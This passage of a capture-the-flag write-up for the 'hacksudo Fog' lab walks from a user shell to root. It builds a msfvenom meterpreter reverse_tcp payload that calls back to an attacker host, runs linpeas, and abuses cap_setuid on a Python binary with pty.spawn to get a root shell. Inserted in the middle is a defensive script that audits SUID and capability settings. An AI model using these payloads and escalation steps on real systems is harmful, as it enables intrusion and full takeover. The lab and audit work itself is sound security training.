Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 13 07:25:51 2021 from 192.168.43.217
isro@hacksudo:~$ id
uid=1003(isro) gid=1003(isro) groups=1003(isro)
isro@hacksudo:~$ sudo -l
[sudo] password for isro: 
Matching Defaults entries for isro on hacksudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User isro may run the following commands on hacksudo:
    (root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$ ls -alh
total 32K
drwxr-x--- 5 isro isro 4.0K May 13  2021 .
drwxr-xr-x 6 root root 4.0K May  8  2021 ..
-rw-r--r-- 1 isro isro    0 May  5  2021 .bash_logout
-rw-r--r-- 1 isro isro 4.6K May 13  2021 .bashrc
drwxr-xr-x 2 isro isro 4.0K May 13  2021 fog
drwx------ 3 isro isro 4.0K May  5  2021 .gnupg
drwxr-xr-x 3 isro isro 4.0K May  5  2021 .local
-rw-r--r-- 1 isro isro    0 May  5  2021 .profile
-r-------- 1 isro isro   33 May  6  2021 user.txt
isro@hacksudo:~$ cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
isro@hacksudo:~$ 
```

Privilege escalation

Next, see whether the shell can be upgraded to a meterpreter session.

```
┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf
```

Upload escalate.elf to the /tmp directory on the target host.

But the suggester finds no module that can escalate privileges.

Upload the linpeas.sh script to /tmp on the target host, make it executable, and run it; it reports that the fog binary carries the setuid capability.

```
Files with capabilities (limited to 50):
/home/isro/fog/fog = cap_setuid+ep
```
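Both findings that decided this box, the unexpected SUID bit on /usr/bin/look and cap_setuid on a Python interpreter sitting in a user's home directory, are the kind of thing a periodic privilege audit catches before an attacker does. The following is an added example, not from the write-up and not linpeas: it consumes the two outputs shown above, the `find / -perm -4000 -type f` listing and the "Files with capabilities" list in `getcap -r` format, and reports SUID files absent from a known-good baseline, file capabilities that amount to root, and privileged files living outside the system directories. The baseline set, the dangerous-capability set, the extra ping line in the sample, and the function names are assumptions of this example.

```python
# Added example: audit SUID binaries and file capabilities from the tool output
# shown in the write-up. Python 3 standard library only.

# Assumed baseline for the example: the write-up's SUID list with /usr/bin/look
# removed. A real baseline comes from a clean image of the same distribution.
SUID_BASELINE = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/sbin/mount.nfs",
    "/usr/bin/gpasswd", "/usr/bin/umount", "/usr/bin/sudo", "/usr/bin/chfn",
    "/usr/bin/mount", "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/su",
    "/usr/bin/passwd",
}

# Capabilities that let a process change identity or bypass DAC; any of these
# on a file is effectively a SUID-root binary (assumed set for the example).
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_sys_rawio",
}

SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/", "/opt/")

# Constructed sample input: the find output from the write-up, verbatim.
FIND_OUTPUT = """\
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
"""

# Constructed sample input: the linpeas capability block from the write-up plus
# a benign ping line (added here) to show that harmless capabilities are ignored.
GETCAP_OUTPUT = """\
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/home/isro/fog/fog = cap_setuid+ep
"""


def unexpected_suid(find_output, baseline=SUID_BASELINE):
    """SUID paths present on the host but absent from the baseline."""
    paths = {line.strip() for line in find_output.splitlines() if line.strip()}
    return sorted(paths - baseline)


def parse_getcap(text):
    """Parse getcap-style lines into (path, {capability, ...}) pairs.

    Handles the older 'path = cap_a,cap_b+ep' and newer 'path cap_a,cap_b=ep'
    spellings and skips header lines such as linpeas' first line.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("/"):
            continue
        if " = " in line:
            path, caps = line.split(" = ", 1)
        else:
            path, _, caps = line.rpartition(" ")
        names = caps.split("+")[0].split("=")[0]  # drop the +ep / =ep flag suffix
        entries.append((path, {c.strip() for c in names.split(",") if c.strip()}))
    return entries


def outside_system_dirs(path):
    """Privileged files under /home, /tmp, /var/www etc. deserve a second look."""
    return not path.startswith(SYSTEM_PREFIXES)


def dangerous_capabilities(text, dangerous=DANGEROUS_CAPS):
    """(path, [dangerous caps], outside_system_dirs) for each risky entry."""
    hits = []
    for path, caps in parse_getcap(text):
        bad = sorted(caps & dangerous)
        if bad:
            hits.append((path, bad, outside_system_dirs(path)))
    return hits


def audit(find_output, getcap_output):
    return {"unexpected_suid": unexpected_suid(find_output),
            "dangerous_caps": dangerous_capabilities(getcap_output)}


if __name__ == "__main__":
    print(audit(FIND_OUTPUT, GETCAP_OUTPUT))
```

Run against the listings from this box it reports /usr/bin/look as an off-baseline SUID file and /home/isro/fog/fog as cap_setuid in a non-system directory, while /usr/bin/ping's cap_net_raw is left alone; the fix for both is to remove the bit (`chmod u-s`, `setcap -r`) and ask why it was there.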

Running /home/isro/fog/fog shows that it is actually Python, so privilege escalation is straightforward.

```
isro@hacksudo:~/fog$ ./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15) 
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> import pty
>>> pty.spawn("/bin/bash")
┌──(root?hacksudo)-[~/fog]
└─# id
uid=0(root) gid=1003(isro) groups=1003(isro)

┌──(root?hacksudo)-[~/fog]
└─# cd /root

┌──(root?hacksudo)-[/root]
└─# ls -alh
total 44K
drwx------  5 root root 4.0K May 10  2021 .
drwxr-xr-x 20 root root 4.0K May  9  2021 ..
-rw-------  1 root root  638 May 13  2021 .bash_history
-rw-r--r--  1 root root  598 May  6  2021 .bashrc
drwxr-xr-x 10 root root 4.0K May  8  2021 fogproject-1.5.9
drwx------  3 root root 4.0K May  6  2021 .gnupg
drwxr-xr-x  3 root root 4.0K May  4  2021 .local
-rw-------  1 root root  738 May 10  2021 .mysql_history
-rw-r--r--  1 root root  178 May  4  2021 .profile
-r--------  1 root 1000 1.5K May  6  2021 root.txt
-rw-r--r--  1 root root  249 May 10  2021 .wget-hsts

┌──(root?hacksudo)-[/root]
└─# cat root.txt
[ASCII-art banner reading "DIE HUMAN"]
great you rooted hacksudo Fog Box !!!
flag {4356a779ce18252fa1dd2d2b6ab56b19}
submit this flag at hacksudo discord https://discord.gg/vK4NRYt3
```

STRIVE FOR PROGRESS, NOT FOR PERFECTION